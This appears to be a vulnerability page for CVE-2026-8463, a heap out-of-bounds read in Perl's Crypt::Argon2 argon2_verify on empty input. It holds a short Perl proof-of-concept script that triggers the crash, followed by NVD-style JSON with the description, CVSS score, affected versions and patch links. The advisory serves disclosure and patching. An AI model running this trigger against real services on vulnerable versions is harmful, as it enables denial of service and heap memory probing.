CVE-2026-8463

#!/usr/bin/perl use strict; use warnings; use Crypt::Argon2; # Vulnerable version: 0.017 <= v < 0.031 # This PoC demonstrates triggering the heap out-of-bounds read # by passing an empty string to argon2_verify. my $empty_hash = ""; # The empty input triggers the underflow print "Attempting to verify empty hash...\n"; # This call is expected to cause a crash or abnormal behavior # due to memchr(encoded, '$', SIZE_MAX) eval { argon2_verify($empty_hash, "password"); }; if ($@) { print "Error caught: $@"; } else { print "Verification returned (unexpectedly).\n"; }

{"cve": {"id": "CVE-2026-8463", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2026-05-13T14:18:17.140", "lastModified": "2026-05-13T19:23:38.790", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Crypt::Argon2 versions from 0.017 before 0.031 for Perl perform a heap out-of-bounds read in argon2_verify on empty encoded input.\n\nThe auto-detect form of argon2_verify passes encoded_len - 1 as the length argument to memchr without checking that encoded_len is non-zero. When the encoded string is empty, the size_t subtraction underflows to SIZE_MAX and memchr scans adjacent heap memory looking for a '$' separator byte.\n\nA caller that invokes argon2_verify against a stored hash that may legitimately be empty (for example a placeholder row or a NULL column materialised as an empty string) reads out-of-bounds heap memory, which can crash the process or leak the position of an adjacent '$' byte into subsequent parsing."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-126"}, {"lang": "en", "value": "CWE-191"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:leont:crypt\\:\\:argon2:*:*:*:*:*:perl:*:*", "versionStartIncluding": "0.017", "versionEndExcluding": "0.031", "matchCriteriaId": "665F8DDD-FC30-44AE-8E88-5292B014AB76"}]}]}], "references": [{"url": "https://github.com/Leont/crypt-argon2/commit/92eac03ce63d541e0ead7ea5a89b9b67ce0c0e64.patch", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Patch"]}, {"url": "https://metacpan.org/release/LEONT/Crypt-Argon2-0.031/changes", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Release Notes"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/13/4", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}